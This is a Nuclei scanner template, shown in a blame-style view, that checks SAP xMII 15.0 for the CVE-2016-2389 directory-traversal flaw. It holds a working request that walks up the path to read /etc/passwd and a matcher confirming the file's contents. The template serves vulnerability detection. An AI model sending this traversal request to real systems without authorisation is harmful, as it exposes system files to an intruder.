my-nuclei-templates/CVE-2016-2389.yaml

38 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-08-19 10:29:24 +00:00
id: CVE-2016-2389
info:
2022-06-18 08:05:25 +00:00
name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
2021-08-19 10:29:24 +00:00
author: daffainfo
severity: high
2022-06-18 08:05:25 +00:00
description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
2021-09-02 08:03:02 +00:00
reference:
2021-08-19 10:29:24 +00:00
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
2022-06-18 08:05:25 +00:00
- http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
- https://www.exploit-db.com/exploits/39837/
- https://nvd.nist.gov/vuln/detail/CVE-2016-2389
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 7.5
2021-09-17 06:03:58 +00:00
cve-id: CVE-2016-2389
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2016,lfi,sap
2021-08-19 10:29:24 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-08-19 10:29:24 +00:00
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/06/09